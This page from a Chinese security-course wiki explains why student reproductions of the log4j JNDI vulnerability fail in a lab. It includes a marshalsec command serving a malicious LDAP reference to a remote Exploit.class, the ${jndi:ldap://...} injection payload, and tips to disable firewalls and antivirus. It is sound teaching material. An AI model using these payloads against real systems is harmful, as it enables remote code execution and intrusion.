课程问题
【汇总】刻录BadUSB问题-社会工程学
【汇总】CVE-2022-22965-SpringRCE复现问题
Linux文件管理章节,排除exclude隐藏文件、查找不是以txt结尾的文件
Linux编辑模式如何恢复操作?
计算机网络-安装winPcap提示a newer version of WinPcap is already installed on this machine
MySQL表添加外键不生效
MySQL-phpMyAdmin登录失败
PHP代码在vscode不能执行
kali安装docker失败
CSRF漏洞学完了,怎么练习
kali apt安装软件提示:unable to locate package无法定位软件包
kali中beef-xss配置文件
msf安装viper炫彩蛇 docker-compose up -d 报错
【汇总】git信息泄露,githack利用不成功
【汇总】蚁剑antsword连接报错
Kioptrix Level 1靶机扫描不到IP
逆向课程吾爱破解工具包不能运行
【汇总】永恒之蓝漏洞/eternalblue/ms17-010复现不成功
跳板机发起攻击的问题
跳板机也会被追溯到吧,以为用访问日志和历史查看?
逆向课程,win10 64位的od 和IDA 在哪下?
vulnhub靶场prime1提权失败GLIBC问题
Linux git clone TCP connection reset by peer
ssrf与gopher与redis
CSRF靶场报错无数据库以及复现漏洞时金额不减少的问题
【汇总】SQL注入靶场sqli-labs连接/数据库初始化错误
sqli-labs靶场21关报错:mysqli_real_escape_string() expects parameter 1 to by mysqli, null given in
SQL注入floor报错注入原理
【汇总】SQL注入load_file不能读文件(secure_file_priv)
SQL注入 python盲注脚本出现了多余错误的字符
Kali——SQL注入的school靶场怎么搭建?
在使用sqlmap时,明明有注入点,却sqlmap跑不出来,会是什么原因?
CNNVD漏洞分类指南旧网址打不开
msf编码免杀执行报错:No .text section found in the template
zenmap(nmap windows版本)下载地址
【汇总】安装运行oneforall报错
PHP代码提示 expects parameter 1 to be mysqli_result bool given in
安装xsser报错,pkgProblemResolver
安装CodeTest报错
【汇总】DVWA靶场报错
PHP报错C:\php\ext\php_mysqli.dll (找不到指定的模块)
java-jar启动报错找不到或无法加载主类
【汇总】文件上传漏洞upload-labs无法复现汇总
SSH Key后门免密登录
localhost和127.0.0.1的关系
Apache添加mod security模块后无法启动
fastjson JdbcRowSetImpl利用链,为什么会自动执行恶意代码
反弹连接命令的含义
【汇总】Redis客户端不能连接到Redis服务端,卡住、超时或者拒绝连接
【汇总】反弹连接不成功(Redis未授权访问漏洞)
PAM依据什么找到服务对应的配置文件?
【汇总】文件上传漏洞upload-labs靶场无图片、无样式,打开关卡404
【汇总】Apache启动失败
【汇总】Fastjson复现失败总结和思路
免杀课程上的有溢出漏洞360版本在哪下
awvs web网站打不开
【汇总】vulhub靶场无法启动/连接
浏览器的cookie文件保存在哪里
log4j无法修改日志等级问题,只有error触发漏洞
Charles抓包问题
useradd 参数 -p 指定密码登录失败
tar -rf 往gz 压缩包里面追加文件
SQL注入中如users表名显示的字段名过多
Redis连接成功,但执行命令时报错(error) DENIED Redis is running in protected mode
在渗透测试过程中,怎么判断一个web网站使用了struts
青花瓷插件版本(charles证书导入burp suite)
SRC基础抓包 - proxifier抓小程序包报错
sqli-labs使用group_concat查询时报错:在没有GROUP BY的聚合查询中,SELECT 列表的表达式#3包含非聚合列'security.users.password;这与sql_mode=only_full _group_by 不兼容
nessus 报错 UnicodeDecodeError: 'gbk' codec can't decode byte 0xa2 in position 6588: illegal multibyte sequence
灯塔 timeout of 12000ms
SUID提权find -p问题
信息收集搭建代理IP|快代理的使用|搭建代理池
Webgoat Java源代码审计靶场问题汇总
XSS课程sendmail收不到邮件
SUDO权限配置不成功
beef-xss启动失败
centos7替换yum源为阿里云报错正在连接 mirrors.xxx | 127.0.0.2|:80... 失败:拒绝连接。
交换互联互通基础-实验:三层网关通信 配置失败问题
cmd运行.py文件,会自动弹出pycharm
永恒之蓝漏洞run vnc没有反应
sed删除两个特定字符中间的内容
sqli-labs靶场报错group_concat does no exist
RuoYiv4.7.1启动报错java: 程序包io.swagger.annotations不存在
type-poc.php运行报错unexpected T_PAAMAYIM_NEKUDOTAYIM
typecho反序列化漏洞复现失败问题
安卓模拟器openssl转换burp证书报错
计算机网络-网络协议分析-威胁数据流实战Bravo-1.pcapng流量分析答案
打开了php.ini搜索magic_quotes_gpc = On找不到
获取windows保存的明文WiFi密码
反序列化工程serialize-vul只能查看.class不能查看.java源码
【汇总】codereg.py-ddddocr启动/识别问题
【汇总】shiro反序列化(包括内存马)复现问题
【汇总】pikachu-XSS后台-pkXss报错复现不成功
域控和域管理员有啥区别
csrf靶场bank登录出现404错误
PHP代码审计-bluecms靶场搭建
"echo PHP_EOL"查了是换行符的意思,但运行完却没有换行
思科路由器ip地址调试界面问题
【汇总】log4j漏洞复现不成功-原因和排查思路
MySQL约束不生效,插入数据不报错
sqlmap --os-shell失败 无写入权限
MYSQL80:ERROR 1045 (28000):解决方法
MYSQL:绕过权限验证存在的问题(mysqld --console --skip-grant-tables --shared-memory)
vmware workstation虚拟机列表没有“共享的虚拟机”
vulnhub-dc9-端口敲门以后无法连接
docker拉取镜像失败pulling fs layer
【汇总】Weblogic漏洞复现问题
xss-labs第14关不显示
计算机网络课程-子网划分答案
sqlmap执行POST注入的两种方式
逆向课程开发工具vs2008 vc6.0
sqli-labs靶场第21关cannot modify header information -headers错误
Cannot resolve plugin org.apache.maven.plugins:maven-resources-plugin:3.2.0
msi宏病毒,双击xlsm文件没有上线
【汇总】综合信息收集工具hbit运行相关问题
解决自建wooyun系统无法使用搜索功能
【汇总】easyocr运行报错
w8fuckcdn运行文件报错
执行net view报错6118
浏览器打开PHP文件显示源代码,没有运行代码
安装jwt-cracker报错idealTree:lib: sill idealTree buildDeps
burp插件HAE相关问题
Linux配置Java/JDK(Kali启动JRMPListener报错)
esedbexport工具的github地址已经失效
beef-xss报错in `require`: cannot load such file -- msgpack(LoadError)
【汇总】yum安装MySQL,mysql -uroot -p临时密码无法登录
灯塔ARL报错timeout of 12000ms exceeded
httpconn暴破dvwa第一个密码0000提示破解成功
【汇总】访问jsp文件报错:HTTP500内部服务器错误,无法编译为JSP类
【汇总】sqlmap运行报错
powershell脚本运行问题
【汇总】API漏洞-crapi靶场问题
Excel无法在未启用宏的工作簿中保存以下功能
CVE-2020-16848 SaltStack命令注入返回406 Not acceptable
【汇总】IDEA-Tomcat项目访问页面404,找不到localhost的网页
python2安装Crypto库报错
安装Typecho无法连接数据库Database Server Error
find -name加引号和不加引号的区别
【汇总】Docker逃逸问题-CVE-2019-5736-CVE漏洞复现
XXE漏洞,不能读取本地文件
vulnhub-breach1-war包报错
Apache Commons Collections调用链路
log4j工程unboundid依赖报错
【汇总】内存马AgentDemo工程报错
vulnhub-prime靶机显示异常
Shiro反序列化漏洞原理解释
内存马课程小马xiaoma.jsp上传文件失败
vulhub-log4j漏洞复现流程
【汇总】CVE-2021-31805-struts2 s2-062漏洞复现失败
安卓逆向手机选择
【汇总】WinRAR代码执行漏洞CVE-2023-38831
vulnhub靶机扫描不到ip地址
kill -9 杀不死ping baidu进程的问题
【汇总】CVE-2022-22947-Spring Cloud Gateway RCE(SpEL表达式)
XSS课程中存储型XSS靶场无法注册
XSS课程资料代码怎么使用
CVE-2018-12613-phpMyAdmin4.8.x文件包含漏洞
【汇总】CVE-2023-32233 NetFilter权限提升复现失败
本文档使用 MrDoc 发布
-
+
首页
【汇总】log4j漏洞复现不成功-原因和排查思路
vulhub-log4j漏洞复现流程 https://wiki.bafangwy.com/doc/682/ 工程名: apache-log4j-poc 本文涉及的工具: marshalsec-0.0.3-SNAPSHOT-all.jar # 总结 从复现流程来说,确定三个点(按这个顺序排查): <font color="red">1、HTTP服务器是否启动,恶意class是否能下载(在浏览器进行验证,把#改成.class)</font> 验证方式: 1)物理机ping虚拟机IP 2)虚拟机netstat 查看HTTP端口 3)物理机浏览器访问虚拟机IP+端口/Exploit.class <font color="red">2、LDAP服务是否正常启动,是否指向正确的HTTP服务器,两台机器之间网络是否连通</font> 验证方式: 1)Windows 新开一个CMD,`netstat -an|findstr 7365` (或者7912) <font color="red">3、漏洞代码是否正确访问到LDAP服务器(代码中是本机的7912端口)</font> 验证方式:查看LDAP端口没有收到下载远程class文件的请求 如果以上任何一步没有成功,就需要单独排查解决。 ------------ ------------ 以下总结了一些复现不成功的原因: # 1、JDK版本不符合要求 比如环境变量的JAVA_HOME 还是JDK11,path里面 %java_home%写死了。 或者虽然设置了path,但是IDEA使用却是其他版本的JDK。 比如这个同学,在工程里面运行代码实际是jdk-18.0.2.1: ![](/media/202311/2023-11-04_192709_9739520.7706881242855652.png) ## 确认方式 在IDEA的terminal里面输入``java -version``确认版本。 解决办法: 修改环境变量中JDK的版本,或者修改project structure中的JDK版本。 参考流程(IDEA切换JDK版本:方法1):https://wiki.bafangwy.com/doc/533/ 建议使用跟课程中一样的JDK版本(jdk1.8.0_74) ## 2、机器之间网络不连通 例如:HTTP服务器没有启动、LDAP服务没启动、HTTP服务器连不上 排查方法: 1)确定端口启动情况 Linux:``netstat -an|grep 80`` windows ``netstat -an|findstr 7912`` 2)确定连通情况(在物理机ping虚拟机IP) 3)测试文件下载(浏览器访问Exploit.class文件地址) **【防火墙规则】** 如果LDAP 7912或者7365服务部署在云服务器,还需要检查[安全组配置](/doc/722/ "安全组配置")情况。 如果LDAP 7912或者7365服务部署在Linux,还需要检查[防火墙](/doc/183/ "防火墙")的情况。 查看防火墙状态: `firewall-cmd --state` 在防火墙开启的情况下,通过以下命令在防火墙中允许7365端口流量: ``` firewall-cmd --add-port=8888/tcp --permanent firewall-cmd --reload ``` 查看防火墙规则: `firewall-cmd --list-all` 如果防火墙是关闭的,则移除规则: `firewall-cmd --remove-port=8888/tcp` 停止防火墙 `systemctl stop firewalld.service` 第二种方法是在没有添加防火墙规则的情况下,关闭防火墙,参考: https://wiki.bafangwy.com/doc/72/ ## 3、恶意代码内容不对或者编译版本不对 例如:改了Exploit的代码位置或者内容,没有覆盖上传 排查方法:用jd-gui.exe工具对下载的Exploit.class的内容进行反编译,确认。 解决办法:删除原Exploit.class文件,重新上传 如果是编译版本不对: 把Exploit.java放到`jdk1.8.0_74\bin`目录下,打开cmd,用`javac Exploit.java`进行编译。 下面这个错误就是说明编译Exploit.java的JDK版本过高 `Exception in thread "main" java.ang.unsupported class version Error Create breakpoint : Exploit has been compiled by a more recent version of the java Runtime ` ![](/media/202410/2024-10-04_131622_7665330.8618635004602171.png) ## 4、HTTP服务器的问题 Apache、python都可以试试。windows不行的话,放到Linux上。 `python --version`确认版本。 Linux python2启动HTTP服务(在Exploit.class所在目录启动): `python2-m SimpleHTTPServer 8888` Linux python3启动HTTP服务(在Exploit.class所在目录启动): `python -m http.server 8888` ## 5、本地LADP服务的问题 Spring boot的案例, Java LADP不行,就用marshalsec启动LDAP服务 解决办法:使用 marshalsec-0.0.3-SNAPSHOT-all.jar 提供恶意LDAP服务 ``` java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.142.66:80/#Exploit 7365 ``` `http://192.168.142.66:80/#Exploit` 改成你的HTTP服务器的IP端口,后面填写你的恶意类的类名,注意文件名没有.class `7365`是你开启ldap服务的端口号,如果不加端口号,它的默认端口号为`1099`。 访问(改成启动服务的IP): `${jndi:ldap://x.x.x.x:7365/test}` # 6、log4j的版本不对(这种情况很少) 例如:log4j的版本临时改成了2.15,忘记改回去 解决办法:确定pom.xml的log4j版本,降低到2.14.1及以下,在pom.xml上reload ![](/media/202308/2023-08-08_141735_4222030.16152192800615361.png) ## 7、(Linux)Exploit.class没有权限访问(这种情况很少) 解决办法: `chmod 777 Exploit.class` ## 8、只有logger.error()会触发漏洞而logger.debug()/logger.info()都不能触发漏洞 参考: https://wiki.bafangwy.com/doc/249/ ## 9、杀毒软件阻止了网络连接 复现漏洞之前关闭360、火绒等杀软,参考: https://www.mashibing.com/question/detail/106784 ------------ 根据以上排查思路复现成功: ![](/media/202308/2023-08-09_094242_0115110.4079847900345628.png) 关键字:CVE、log4j2、Apache
无涯
2024年10月4日 13:17
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
分享
链接
类型
密码
更新密码